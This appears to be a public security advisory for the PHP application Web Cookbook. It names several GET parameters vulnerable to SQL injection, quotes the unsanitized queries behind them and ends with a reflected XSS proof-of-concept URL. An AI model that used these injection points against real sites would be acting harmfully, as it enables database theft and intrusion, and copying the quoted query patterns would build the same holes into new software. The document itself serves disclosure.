标题: Web Cookbook Multiple SQL Injection
作者: Saadat Ullah , saadi_linux@rocketmail.com
下载地址:
主页:
测试系统: Server: Apache/2.2.15 (Centos) PHP/5.3.3
 
# SQL 注射
 
?sstring=[SQLi]
/cook/showtext.php?mode=[SQLi]
?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
 
 
?mode=[SQLi]
#Proof Of Concept
In showtext.php
Code:
$mode = $_GET["mode"];
.
.
showText($mode, $art);//sending $mode to a function without sanitizing it
.
.
function showText($kategorie, $art) {
    initDB();
    echo "<div class=\"rdisplay\">\n";
    $query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry
    $result = mysql_query($query);
.
.
All GET Fields Are Vuln To SQLi
?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
#p0c
In searchrecipe.php
    $title = $_GET['title'];
    $prefix = $_GET['prefix'];
    $preparation = $_GET['preparation'];
    $postfix = $_GET['postfix'];
    $tipp = $_GET['tipp'];
    $ingredient = $_GET['ingredient'];
    .
    .
    .
    if ($title != "") {
        $sstring = "a.title LIKE '%$title%' ";
    }
    .
    .
    searchRecipe($mode, $sstring);
    .
    .
    In Function SearchRecipe
                $query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
 
 
?sstring=[SQLi]
测试利用:
$sstring = $_GET['sstring'];
        if ($sstring != "") {
            searchRecipe(0, $sstring);
.
.
.
    $query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
 
 
一个简单的非持久 XSS
/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=
 
 
#Independent Pakistani Security Researcher